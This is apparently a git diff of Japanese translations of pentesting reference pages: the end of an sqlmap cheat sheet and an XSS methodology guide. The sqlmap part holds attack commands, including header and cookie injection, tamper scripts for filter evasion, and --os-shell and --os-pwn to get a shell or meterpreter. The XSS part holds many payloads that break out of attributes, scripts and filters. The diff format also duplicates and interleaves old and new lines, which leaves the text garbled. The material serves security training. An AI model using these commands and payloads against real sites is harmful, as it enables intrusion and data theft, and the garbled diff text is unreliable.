## ヘッダーおよびその他のHTTPメソッドにおけるインジェクション
### ヘッダーおよびその他のHTTPメソッドにおけるインジェクション
```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
@ -69,12 +71,12 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
```
## セカンドオーダーインジェクション
### セカンドオーダーインジェクション
```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
## シェル
### シェル
```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
@ -85,7 +87,7 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
## SQLmapを使用してウェブサイトをクロールし、自動的にエクスプロイトする
### SQLmapを使用してウェブサイトをクロールし、自動的にエクスプロイトする
```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
@ -93,22 +95,22 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
# インジェクションのカスタマイズ
## インジェクションのカスタマイズ
## サフィックスを設定する
### サフィックスを設定する
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
## プレフィックス
### プレフィックス
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```
## ブールインジェクションの発見を手伝う
### ブールインジェクションの発見を手伝う
```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```
## Tamper
### Tamper
```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
@ -125,41 +127,41 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
| commalesslimit.py | 'LIMIT M, N' のようなインスタンスを 'LIMIT N OFFSET M' に置き換えます。 |
| commalessmid.py | 'MID\(A, B, C\)' のようなインスタンスを 'MID\(A FROM B FOR C\)' に置き換えます。 |
| concat2concatws.py | 'CONCAT\(A, B\)' のようなインスタンスを 'CONCAT_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)' に置き換えます。 |
| charencode.py | 指定されたペイロード内のすべての文字をURLエンコードしますすでにエンコードされたものは処理しません |
| charencode.py | 指定されたペイロード内のすべての文字をURLエンコードしますすでにエンコードされたものは処理しません。 |
| charunicodeencode.py | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードしますすでにエンコードされたものは処理しません。 "%u0022" |
| charunicodeescape.py | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードしますすでにエンコードされたものは処理しません。 "\u0022" |
| equaltolike.py | 演算子等号 \('='\) のすべての出現を演算子 'LIKE' に置き換えます。 |
| escapequotes.py | スラッシュで引用符 \(' と "\) をエスケープします。 |
| escapequotes.py | クォート \(' と "\) をスラッシュでエスケープします。 |
| greatest.py | 大なり演算子 \('&gt;'\) を 'GREATEST' 対応物に置き換えます。 |
| halfversionedmorekeywords.py | 各キーワードの前にバージョン付きMySQLコメントを追加します。 |
| ifnull2ifisnull.py | 'IFNULL\(A, B\)' のようなインスタンスを 'IF\(ISNULL\(A\), B, A\)' に置き換えます。 |
| ifnull2ifisnull.py | 'IFNULL\(A, B\)' のようなインスタンスを 'IF\(ISNULL\(A\), B, A\)' に置き換えます。 |
| modsecurityversioned.py | 完全なクエリをバージョン付きコメントで囲みます。 |
| modsecurityzeroversioned.py | 完全なクエリをゼロバージョン付きコメントで囲みます。 |
| multiplespaces.py | SQLキーワードの周りに複数のスペースを追加します。 |
| nonrecursivereplacement.py | 置換に適した定義済みSQLキーワードを置き換えます.replace\("SELECT", ""\) フィルター)。 |
| percentage.py | 各文字の前にパーセント記号 \('%'\) を追加します。 |
| overlongutf8.py | 指定されたペイロード内のすべての文字を変換します(すでにエンコードされたものは処理しません)。 |
| randomcase.py | 各キーワード文字をランダムなケース値に置き換えます。 |
| nonrecursivereplacement.py | 定義済みSQLキーワードを置き換えに適した表現に置き換えます(例:.replace\("SELECT", ""\) フィルター)。 |
| percentage.py | 各文字の前にパーセント記号 \('%'\) を追加します。 |
| overlongutf8.py | 指定されたペイロード内のすべての文字を変換します(すでにエンコードされたものは処理しません)。 |
| randomcase.py | 各キーワード文字をランダムなケース値に置き換えます。 |
| randomcomments.py | SQLキーワードにランダムなコメントを追加します。 |
| securesphere.py | 特別に作成された文字列を追加します。 |
| sp_password.py | ペイロードの末尾に 'sp_password' を追加し、DBMSログからの自動的な難読化を行います。 |
| sp_password.py | ペイロードの末尾に 'sp_password' を追加し、DBMSログから自動的に難読化します。 |
| space2comment.py | スペース文字 \(' '\) をコメントに置き換えます。 |
| space2dash.py | スペース文字 \(' '\) をダッシュコメント \('--'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。 |
| space2hash.py | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。 |
| space2morehash.py | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後にランダムな文字列と改行 \('\n'\) を追加します。 |
| space2mssqlblank.py | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。 |
| space2mssqlhash.py | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後に改行 \('\n'\) を追加します。 |
| space2mysqlblank.py | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。 |
| space2mysqldash.py | スペース文字 \(' '\) をダッシュコメント \('--'\) に置き換え、その後に改行 \('\n'\) を追加します。 |
| space2plus.py | スペース文字 \(' '\) をプラス \('+'\) に置き換えます。 |
| space2randomblank.py | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。 |
| space2mssqlblank.py | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。 |
| space2mssqlhash.py | スペース文字 \(' '\) をポンド文字 \('\#'\) に置き換え、その後に改行 \('\n'\) を追加します。 |
| space2mysqlblank.py | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。 |
| space2mysqldash.py | スペース文字 \(' '\) をダッシュコメント \('--'\) に置き換え、その後に改行 \('\n'\) を追加します。 |
| space2plus.py | スペース文字 \(' '\) をプラス \('+'\) に置き換えます。 |
| space2randomblank.py | スペース文字 \(' '\) を有効な代替文字のセットからのランダムな空白文字に置き換えます。 |
| symboliclogical.py | ANDおよびOR論理演算子をその記号対応物 \(&& と |
| unionalltounion.py | UNION ALL SELECT を UNION SELECT に置き換えます。 |
| unmagicquotes.py | 引用文字 \('\) をマルチバイトコンボ %bf%27 と一般的なコメントを末尾に追加します(動作させるため)。 |
| uppercase.py | 各キーワード文字を大文字の値 'INSERT' に置き換えます。 |
| unmagicquotes.py | クォート文字 \('\) をマルチバイトコンボ %bf%27 と一般的なコメントを末尾に追加します(動作させるため)。 |
| uppercase.py | 各キーワード文字を大文字の値 'INSERT' に置き換えます。 |
| varnish.py | HTTPヘッダー 'X-originating-IP' を追加します。 |
| versionedkeywords.py | 各非関数キーワードをバージョン付きMySQLコメントで囲みます。 |
| versionedmorekeywords.py | 各キーワードをバージョン付きMySQLコメントで囲みます。 |
| xforwardedfor.py | 偽のHTTPヘッダー 'X-Forwarded-For' を追加します。 |
| xforwardedfor.py | 偽のHTTPヘッダー 'X-Forwarded-For' を追加します。 |
{{#include ../../banners/hacktricks-training.md}}

148
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -1,8 +1,10 @@
# XSS (クロスサイトスクリプティング)
# XSS (Cross Site Scripting)
## 方法論
{{#include /banners/hacktricks-training.md}}
1. **あなたが制御する任意の値** (_パラメータ_, _パス_, _ヘッダー_?, _クッキー_?) がHTMLに**反映**されているか、**JS**コードで**使用**されているかを確認します。
## Methodology
1. **あなたが制御する任意の値** (_parameters_, _path_, _headers_?, _cookies_?) がHTMLに**反映されている**か、**JS**コードによって**使用されている**かを確認します。
2. **反映されている/使用されているコンテキストを見つけます**
3. **反映されている場合**
1. **使用できる記号を確認し**、それに応じてペイロードを準備します:
@ -12,22 +14,22 @@
3. 保護を回避できますか?
4. HTMLコンテンツがクライアントサイドのJSエンジン (_AngularJS_, _VueJS_, _Mavo_...) によって解釈されている場合、[**クライアントサイドテンプレートインジェクション**](../client-side-template-injection-csti.md)を悪用できるかもしれません。
5. JSコードを実行するHTMLタグを作成できない場合、[**ダングリングマークアップ - HTMLスクリプトレスインジェクション**](../dangling-markup-html-scriptless-injection/index.html)を悪用できるかもしれません。
2. **HTMLタグ内**
2. **HTMLタグ内**の場合
1. 生のHTMLコンテキストに抜け出せますか
2. JSコードを実行するための新しいイベント/属性を作成できますか?
3. あなたが閉じ込められている属性はJS実行をサポートしていますか
4. 保護を回避できますか?
3. **JavaScriptコード内**
3. **JavaScriptコード内**の場合
1. `<script>`タグをエスケープできますか?
2. 文字列をエスケープして異なるJSコードを実行できますか
3. テンプレートリテラル \`\` に入力がありますか?
4. 保護を回避できますか?
4. 実行されているJavascript **関数**
1. 実行する関数の名前を指定できます。例: `?callback=alert(1)`
1. 実行する関数の名前を指定できます。例:`?callback=alert(1)`
4. **使用されている場合**
1. **DOM XSS**を悪用できるかもしれません。あなたの入力がどのように制御されているか、そしてあなたの**制御された入力がどのシンクで使用されているかに注意してください**
複雑なXSSに取り組む際に知っておくと興味深いこと
複雑なXSSに取り組む際には、以下のことを知っておくと興味深いかもしれません
{{#ref}}
debugging-client-side-js.md
@ -38,8 +40,8 @@ debugging-client-side-js.md
XSSを成功裏に悪用するために最初に見つけるべきことは、**あなたが制御する値がウェブページに反映されていること**です。
- **中間的に反映された**:パラメータの値やパスがウェブページに反映されていることがわかった場合、**反映されたXSS**を悪用できるかもしれません。
- **保存されて反映された**:あなたが制御する値がサーバーに保存され、ページにアクセスするたびに反映される場合、**保存されたXSS**を悪用できるかもしれません。
- **JS経由でアクセスされた**あなたが制御する値がJSを使用してアクセスされている場合、**DOM XSS**を悪用できるかもしれません。
- **保存されて反映された**:あなたが制御する値がサーバーに保存され、ページにアクセスするたびに反映されることがわかった場合、**保存されたXSS**を悪用できるかもしれません。
- **JS経由でアクセスされた**あなたが制御する値がJSを使用してアクセスされていることがわかった場合、**DOM XSS**を悪用できるかもしれません。
## コンテキスト
@ -54,12 +56,12 @@ XSSを悪用しようとする際に最初に知っておくべきことは、**
あなたの入力がタグの属性の値内に反映されている場合、次のことを試みることができます:
1. **属性とタグからエスケープする**その後、生のHTMLにいることになりますし、新しいHTMLタグを作成して悪用します`"><img [...]`
2. **属性からはエスケープできるがタグからはできない**場合(`>`がエンコードまたは削除されている)、タグに応じて**JSコードを実行するイベントを作成**できるかもしれません:`" autofocus onfocus=alert(1) x="`
3. **属性からエスケープできない**場合(`"`がエンコードまたは削除されている)、あなたの値が反映されている**属性**に応じて、**すべての値を制御しているか、一部だけを制御しているか**によって悪用できるかもしれません。**例えば**、`onclick=`のようなイベントを制御している場合、クリックされたときに任意のコードを実行させることができます。もう一つの興味深い**例**は、`href`属性で、`javascript:`プロトコルを使用して任意のコードを実行できます:**`href="javascript:alert(1)"`**
4. あなたの入力が**悪用できないタグ**内に反映されている場合、脆弱性を悪用するために**`accesskey`**トリックを試みることができます(これを悪用するには何らかの社会工学が必要です):**`" accesskey="x" onclick="alert(1)" x="`**
1. **属性とタグから抜け出す**その後、生のHTMLにいることになります新しいHTMLタグを作成して悪用します`"><img [...]`
2. **属性からは抜け出せるがタグからは抜け出せない**場合(`>`がエンコードまたは削除されている)、タグに応じて**JSコードを実行するイベントを作成**できるかもしれません:`" autofocus onfocus=alert(1) x="`
3. **属性から抜け出せない**場合(`"`がエンコードまたは削除されている)、あなたの値が反映されている**属性**に応じて、**すべての値を制御しているか、一部だけを制御しているか**によって悪用できるかもしれません。**例えば**、`onclick=`のようなイベントを制御している場合、クリックされたときに任意のコードを実行させることができます。もう一つの興味深い**例**は、`href`属性で、`javascript:`プロトコルを使用して任意のコードを実行できます:**`href="javascript:alert(1)"`**
4. あなたの入力が**悪用できないタグ**内に反映されている場合、脆弱性を悪用するために**`accesskey`**トリックを試みることができます(これを悪用するには何らかの社会工学が必要です):**`" accesskey="x" onclick="alert(1)" x="**
クラス名を制御する場合のAngularによるXSSの奇妙な例:
クラス名を制御している場合のAngularがXSSを実行する奇妙な例:
```html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
@ -69,8 +71,8 @@ XSSを悪用しようとする際に最初に知っておくべきことは、**
この場合、あなたの入力はHTMLページの**`<script> [...] </script>`**タグ、`.js`ファイル内、または**`javascript:`**プロトコルを使用した属性内に反映されます:
- **`<script> [...] </script>`**タグの間に反映されている場合、たとえあなたの入力がどんな種類の引用符の中にあっても、`</script>`を注入してこのコンテキストから**脱出**しようとすることができます。これは、**ブラウザが最初にHTMLタグを解析**、その後にコンテンツを解析するため、あなたが注入した`</script>`タグがHTMLコード内にあることに気かないからです。
- **JS文字列内**に反映されていて、最後のトリックが機能しない場合は、文字列から**退出**し、コードを**実行**し、JSコードを**再構築**する必要があります(エラーがある場合は実行されません):
- **`<script> [...] </script>`**タグの間に反映されている場合、たとえあなたの入力がどんな種類の引用符の中にあっても、`</script>`を注入してこのコンテキストから脱出することを試みることができます。これは、**ブラウザが最初にHTMLタグを解析**、その後にコンテンツを解析するため、あなたが注入した`</script>`タグがHTMLコード内にあることに気かないからです。
- **JS文字列内**に反映されていて、最後のトリックが機能しない場合は、文字列を**終了**し、コードを**実行**し、JSコードを**再構築**する必要があります(エラーがある場合は実行されません):
- `'-alert(1)-'`
- `';-alert(1)//`
- `\';alert(1)//`
@ -84,7 +86,7 @@ alert(1)
#### Javascript Hoisting
Javascript Hoistingは、**関数、変数、またはクラスを使用した後に宣言する機会を指し、未宣言の変数や関数を使用するXSSのシナリオを悪用できるようにします。**\
**詳細については、以下のページを確認してください:**
**詳細については、のページを確認してください:**
{{#ref}}
js-hoisting.md
@ -94,11 +96,11 @@ js-hoisting.md
いくつかのウェブページには、**実行する関数の名前をパラメータとして受け入れるエンドポイントがあります**。一般的な例として、`?callback=callbackFunc`のようなものがあります。
ユーザーによって直接提供されたものが実行されようとしているかどうかを確認する良い方法は、**パラメータの値を変更すること**例えば「Vulnerable」にで、コンソールで次のようなエラーを探すことです:
ユーザーによって直接提供された何かが実行されようとしているかどうかを確認する良い方法は、**パラメータの値を変更すること**例えば「Vulnerable」にで、コンソールで次のようなエラーを探すことです:
![](<../../images/image (711).png>)
もし脆弱であれば、**値を送信するだけでアラートをトリガーできる可能性があります**: **`?callback=alert(1)`**。ただし、これらのエンドポイントは、**内容を検証して、文字、数字、ドット、アンダースコアのみを許可することが非常に一般的です****`[\w\._]`**)。
もし脆弱であれば、**値を送信するだけでアラートをトリガーできる可能性があります**: **`?callback=alert(1)`**。ただし、これらのエンドポイントは、**コンテンツを検証して、文字、数字、ドット、アンダースコアのみを許可することが非常に一般的です****`[\w\._]`**)。
しかし、その制限があっても、いくつかのアクションを実行することは依然として可能です。これは、有効な文字を使用して**DOM内の任意の要素にアクセスできるためです**:
@ -149,9 +151,9 @@ server-side-xss-dynamic-pdf.md
## 生のHTML内に注入
あなたの入力が**HTMLページ内に反映される**場合、またはこのコンテキストでHTMLコードをエスケープして注入できる場合、最初に行うべきことは、`<`を悪用して新しいタグを作成できるかどうかを確認することです: その**文字**を**反映**させて、それが**HTMLエンコード**されているか、**削除**されているか、または**変更なしで反映されている**を確認してください。**最後のケースでのみ、このケースを悪用できるでしょう**。\
この場合も、[**クライアントサイドテンプレートインジェクション**](../client-side-template-injection-csti.md)**を念頭に置いてください。**\
_**注: HTMLコメントは、`-->`または`--!>`を使用して閉じることができます。**_
あなたの入力が**HTMLページ内に反映される**場合、またはこのコンテキストでHTMLコードをエスケープして注入できる場合、最初に行うべきことは、`<`を悪用して新しいタグを作成できるかどうかを確認することです: その**文字**を**反映**させて、それが**HTMLエンコード**されているか、**削除**されているか、または**変更なしで反映されている**を確認してください。**最後のケースでのみ、このケースを悪用できるでしょう**。\
この場合も、[**クライアントサイドテンプレートインジェクション**](../client-side-template-injection-csti.md)**を考慮してください。**\
_**注: HTMLコメントは、\*\***\***\*`-->`\*\***\***\*または\*\***`--!>`\*\**を使用して閉じることができます。_
この場合、ブラックリスト/ホワイトリストが使用されていない場合、次のようなペイロードを使用できます:
```html
@ -162,7 +164,7 @@ alert(1)
<svg onload=alert('XSS')>
```
しかし、タグ/属性のブラックリスト/ホワイトリストが使用されている場合、どのタグを作成できるかを**ブルートフォース**する必要があります。\
許可されているタグを**特定したら**、見つかった有効なタグ内の**属性/イベントをブルートフォース**して、どのようにコンテキストを攻撃できるかを確認する必要があります。
どのタグが許可されているかを**特定したら**、見つかった有効なタグ内の**属性/イベントをブルートフォース**して、どのようにコンテキストを攻撃できるかを確認する必要があります。
### タグ/イベントのブルートフォース
@ -176,7 +178,7 @@ alert(1)
```
### ブラックリストバイパス
もし何らかのブラックリストが使用されている場合、いくつかの簡単なトリックを使ってバイパスを試みることができます:
もし何らかのブラックリストが使用されている場合、いくつかのくだらないトリックを使ってバイパスを試みることができます:
```javascript
//Random capitalization
<script> --> <ScrIpT>
@ -233,24 +235,24 @@ onerror=alert`1`
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//.pw>
```
The last one is using 2 unicode characters which expands to 5: telsr\
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
最後のものは、5つに展開される2つのUnicode文字を使用しています: telsr\
これらの文字の詳細は[こちら](https://www.unicode.org/charts/normalization/)で見つけることができます。\
分解された文字を確認するには[こちら](https://www.compart.com/en/unicode/U+2121)をチェックしてください。
### Click XSS - Clickjacking
脆弱性を悪用するために**ユーザーがリンクや事前に入力されたデータを持つフォームをクリックする必要がある**場合、[**Clickjackingを悪用する**](../clickjacking.md#xss-clickjacking)ことを試みることができます(ページが脆弱な場合)。
脆弱性を悪用するために**ユーザーがリンクやフォームをクリックする必要がある**場合、[**Clickjackingを悪用する**](../clickjacking.md#xss-clickjacking)ことを試みることができます(ページが脆弱な場合)。
### Impossible - Dangling Markup
### 不可能 - ダングリングマークアップ
**JSコードを実行する属性を持つHTMLタグを作成することが不可能だと思う**場合、[**Dangling Markup**](../dangling-markup-html-scriptless-injection/index.html)を確認してください。なぜなら、**JS**コードを実行することなく**脆弱性を悪用**できるからです。
**JSコードを実行する属性を持つHTMLタグを作成することは不可能だ**と思うなら、[**ダングリングマークアップ**](../dangling-markup-html-scriptless-injection/index.html)を確認してください。なぜなら、**JS**コードを**実行せずに**脆弱性を**悪用**できるからです。
## Injecting inside HTML tag
## HTMLタグ内へのインジェクション
### Inside the tag/escaping from attribute value
### タグ内/属性値からのエスケープ
**HTMLタグにいる**場合、最初に試すべきことは、タグから**エスケープ**し、[前のセクション](#injecting-inside-raw-html)で言及された技術のいくつかを使用してJSコードを実行することです。\
もし**タグからエスケープできない**場合、タグに新しい属性を作成してJSコードを実行しようとすることができます。例えば、(_この例では属性からエスケープするために二重引用符が使用されていますが、入力がタグ内に直接反映される場合は必要ありません_):
**HTMLタグ内にいる**場合、最初に試すべきことは、タグから**エスケープ**し、[前のセクション](#injecting-inside-raw-html)で言及された技術のいくつかを使用してJSコードを実行することです。\
もし**タグからエスケープできない**場合、タグ内に新しい属性を作成してJSコードを実行しようとすることができます。例えば、(_この例では属性からエスケープするために二重引用符が使用されていますが、入力がタグ内に直接反映される場合は必要ありません_):
```bash
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
@ -272,7 +274,7 @@ To check in which characters are decomposed check [here](https://www.compart.com
**HTMLエンコーディング/URLエンコードを使用したイベント内のバイパス**
HTMLタグ属性の値内の**HTMLエンコードされた文字**は**実行時にデコードされます**。したがって、次のようなものが有効になります(ペイロードは太字で示されています):`<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">戻る </a>`
HTMLタグ属性の値内の**HTMLエンコードされた文字**は**実行時にデコードされます**。したがって、次のようなものが有効になります(ペイロードは太字で示されています):`<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">戻る</a>`
**あらゆる種類のHTMLエンコードが有効であることに注意してください**
```javascript
@ -351,17 +353,17 @@ _**この場合、前のセクションのHTMLエンコーディングとUnicode
```javascript
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```
さらに、これらのケースには別の**素晴らしいトリック**があります:**`javascript:...`内の入力がURLエンコードされていても、実行される前にURLデコードされます。** したがって、**シングルクォート**を使用して**文字列**から**エスケープ**する必要がある場合、**URLエンコードされている**のを見たら、**それは重要ではありません。** 実行時に**シングルクォート**として**解釈**されます。
さらに、これらのケースには別の**いトリック**があります:**`javascript:...`内の入力がURLエンコードされていても、実行される前にURLデコードされます。** したがって、**シングルクォート**を使用して**文字列**から**エスケープ**する必要がある場合、**URLエンコードされている**のを見たら、**それは重要ではありません。** 実行時に**シングルクォート**として**解釈されます。**
```javascript
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
```
注意してください、もしあなたが**両方**の`URLencode + HTMLencode`を任意の順序で**ペイロード**をエンコードするために使用しようとすると、それは**機能しません**が、**ペイロード内で混ぜる**ことはできます。
注意してください、**ペイロード**をエンコードするために`URLencode + HTMLencode`の両方を**どの順序でも**使用しようとすると、それは**機能しません**が、**ペイロード内で混ぜる**ことはできます。
**`javascript:`を使ったHexとOctalエンコード**
**`javascript:`でのHexおよびOctalエンコードの使用**
あなたは**Hex**と**Octalエンコード**を`iframe``src`属性内で(少なくとも)使用して**JSを実行するHTMLタグを宣言**することができます:
少なくとも`iframe``src`属性内で**Hex**および**Octalエンコード**を使用して、**JSを実行するHTMLタグを宣言**できます:
```javascript
//Encoded: <svg onload=alert(1)>
// This WORKS
@ -377,7 +379,7 @@ _**この場合、前のセクションのHTMLエンコーディングとUnicode
```javascript
<a target="_blank" rel="opener"
```
もし任意の**`<a href=`**タグにURLを挿入でき、そのタグが**`target="_blank"`**および**`rel="opener"`**属性を含む場合、**この動作を悪用するために次のページを確認してください**
任意の**`<a href=`**タグに**`target="_blank"`**および**`rel="opener"`**属性を含むURLを挿入できる場合は、この動作を悪用するために**以下のページを確認してください**
{{#ref}}
../reverse-tab-nabbing.md
@ -386,7 +388,7 @@ _**この場合、前のセクションのHTMLエンコーディングとUnicode
### イベントハンドラーバイパスについて
まず、役立つ**"on"イベントハンドラ**についてはこのページを確認してください([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet))。\
このイベントハンドラの作成を妨げるブラックリストがある場合、次のバイパスを試すことができます:
このイベントハンドラの作成を妨げるブラックリストがある場合、次のバイパスを試すことができます:
```javascript
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
@ -422,7 +424,7 @@ onbeforetoggle="alert(2)" />
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
```
[**こちら**](https://portswigger.net/research/xss-in-hidden-input-fields)から: **隠し属性**内で**XSSペイロード**を実行できますが、**犠牲者**に**キーの組み合わせ**を押すように**説得**する必要があります。Firefox Windows/Linuxではキーの組み合わせは**ALT+SHIFT+X**で、OS Xでは**CTRL+ALT+X**です。アクセスキー属性で異なるキーを使用して異なるキーの組み合わせを指定できます。ここにベクターがあります:
[**こちら**](https://portswigger.net/research/xss-in-hidden-input-fields): **隠し属性**内で**XSSペイロード**を実行できますが、**被害者**に**キーの組み合わせ**を押すように**説得**する必要があります。FirefoxWindows/Linuxではキーの組み合わせは**ALT+SHIFT+X**で、OS Xでは**CTRL+ALT+X**です。アクセスキー属性で異なるキーを使用して異なるキーの組み合わせを指定できます。ここにベクターがあります:
```html
<input type="hidden" accesskey="X" onclick="alert(1)">
```
@ -448,15 +450,15 @@ onbeforetoggle="alert(2)" />
### CSSガジェット
もし、**非常に小さな部分**のウェブでXSSを見つけた場合、何らかのインタラクションが必要ですたとえば、onmouseover要素を持つフッターの小さなリンクなど)、その要素が占める**スペースを変更して**、リンクが発火する確率を最大化することを試みることができます。
もし、**非常に小さな部分**のウェブでXSSを見つけた場合、何らかのインタラクションが必要ですフッターの小さなリンクにonmouseover要素があるかもしれません)、その要素が占める**スペースを変更して**、リンクが発火する確率を最大化することを試みることができます。
たとえば、要素に次のようなスタイルを追加できます:`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
えば、要素に次のようなスタイルを追加することができます:`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
しかし、WAFがスタイル属性をフィルタリングしている場合、CSSスタイリングガジェットを使用できます。たとえば、次のようなものを見つけた場合
しかし、WAFがスタイル属性をフィルタリングしている場合、CSSスタイリングガジェットを使用することができます。例えば、次のようなものを見つけた場合
> .test {display:block; color: blue; width: 100%\}
および
> \#someid {top: 0; font-family: Tahoma;}
@ -472,7 +474,7 @@ onbeforetoggle="alert(2)" />
### \<script>タグのエスケープ
もしあなたのコードが`<script> [...] var input = 'reflected data' [...] </script>`の中に挿入されている場合、簡単に**`<script>`タグを閉じることでエスケープ**できます:
もしあなたのコードが`<script> [...] var input = 'reflected data' [...] </script>`の中に挿入されている場合、**`<script>`タグを閉じることで簡単にエスケープできます:**
```javascript
</script><img src=1 onerror=alert(document.domain)>
```
@ -480,7 +482,7 @@ onbeforetoggle="alert(2)" />
### JSコード内
`<>`がサニタイズされている場合でも、**文字列をエスケープ**し、**任意のJSを実行**することができます。JSの構文を**修正する**ことが重要です。エラーがあると、JSコードは実行されません。
`<>`がサニタイズされている場合でも、**文字列をエスケープ**し入力が**存在する場所**で**任意のJSを実行**することができます。JSの構文を**修正する**ことが重要です。エラーがあると、JSコードは実行されません。
```
'-alert(document.domain)-'
';alert(document.domain)//
@ -488,7 +490,7 @@ onbeforetoggle="alert(2)" />
```
### テンプレートリテラル \`\`
**文字列**を構築するために、シングルクォートやダブルクォートの他に、JSは**バックティック** **` `` `**も受け入れます。これはテンプレートリテラルと呼ばれ、`${ ... }`構文を使用して**JS式を埋め込む**ことができます。\
**文字列**を構築するために、シングルクォートやダブルクォートの他に、JSは**バックティック** **` `` `**も受け入れます。これはテンプレートリテラルとして知られ、`${ ... }`構文を使用して**JS式を埋め込む**ことを可能にします。\
したがって、バックティックを使用しているJS文字列内に入力が**反映**されていることがわかった場合、構文`${ ... }`を悪用して**任意のJSコード**を実行することができます:
これは次のように**悪用**できます:
@ -562,7 +564,7 @@ eval(8680439..toString(30))(983801..toString(36))
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
```
**JavaScriptの改行(から** [**JavaScriptの改行**](#javascript-new-lines) **トリック)**
**JavaScriptの新しい行(から** [**JavaScriptの新しい行**](#javascript-new-lines) **トリック)**
```javascript
//Javascript interpret as new line these chars:
String.fromCharCode(10)
@ -739,21 +741,21 @@ top[8680439..toString(30)](1)
```
## **DOMの脆弱性**
攻撃者によって制御され**安全でないデータ**を使用している**JSコード**があります。例えば`location.href`のようなものです。攻撃者はこれを悪用して任意のJSコードを実行することができます。\
**DOMの脆弱性に関する説明が長いため**、[**このページに移動しました**](dom-xss.md)**:**
攻撃者によって制御され**安全でないデータ**を使用している**JSコード**があります。例えば`location.href`のようなものです。攻撃者はこれを悪用して任意のJSコードを実行することができます。\
**DOMの脆弱性に関する説明が拡張されたため、** [**このページに移動しました**](dom-xss.md)**:**
{{#ref}}
dom-xss.md
{{#endref}}
そこでは、**DOMの脆弱性とは何か、どのように引き起こされるか、そしてそれをどのように悪用するかについての詳細な説明**が見つかります。\
また、**前述の投稿の最後に**、[**DOM Clobbering攻撃**](dom-xss.md#dom-clobbering)についての説明があることを忘れないでください
そこでは、**DOMの脆弱性とは何か、どのように引き起こされるのか、そしてどのように悪用されるのかについての詳細な説明**が見つかります。\
また、**前述の投稿の最後には、** [**DOM Clobbering攻撃**](dom-xss.md#dom-clobbering)についての説明がありますので、お忘れなく
### Self-XSSのアップグレード
### Cookie XSS
もしペイロードをクッキー内に送信することでXSSをトリガーできる場合、これは通常self-XSSです。しかし、もし**XSSに対して脆弱なサブドメイン**を見つけた場合、このXSSを悪用して全ドメインにクッキーを注入し、メインドメインまたは他のサブドメインクッキーXSSに対して脆弱なものでクッキーXSSをトリガーすることができます。このために、クッキー投げ攻撃を使用できます
もしペイロードをクッキー内に送信することでXSSをトリガーできる場合、これは通常self-XSSです。しかし、もし**XSSに対して脆弱なサブドメイン**を見つけた場合、このXSSを悪用して全ドメインにクッキーを注入し、メインドメイン他のサブドメインクッキーXSSに対して脆弱なものでクッキーXSSをトリガーすることができます。このために、クッキー投げ攻撃を使用できます
{{#ref}}
../hacking-with-cookies/cookie-tossing.md
@ -763,7 +765,7 @@ dom-xss.md
### 管理者にセッションを送信する
ユーザーが管理者とプロフィールを共有できる場合、もしself XSSがユーザーのプロフィール内にあり、管理者がそれにアクセスすると、脆弱性がトリガーされます。
ユーザーが自分のプロフィールを管理者と共有できる場合、もしself XSSがユーザーのプロフィール内にあり、管理者がそれにアクセスすると、脆弱性がトリガーされます。
### セッションミラーリング
@ -783,7 +785,7 @@ self XSSを見つけ、ウェブページに**管理者用のセッションミ
```
